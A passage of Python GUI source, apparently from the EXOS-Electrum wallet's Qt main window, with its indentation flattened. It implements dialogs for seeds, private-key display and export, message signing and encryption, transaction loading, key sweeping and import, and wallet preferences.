mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in EXOS-Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid EXOS address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid EXOS address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_exos.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("EXOS-Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_exos import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a EXOS URI
if str(data).startswith("exos:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("EXOS-Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_exos import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'exos-electrum-private-keys.csv'
select_msg = _('Select file and location to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("EXOS-Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_exos.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: Fee rate is based on average confirmation time estimates'),
_('Mempool based: Fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', True))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 EXOS = 1000 mEXOS. \n1 mEXOS = 1000 µEXOS. \n1 µEXOS = 100 exo.\n\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_exos import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat by obfuscating your actual transaction amount.') + '\n' +
_('If enabled, at most 100 additional exo could be spent per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
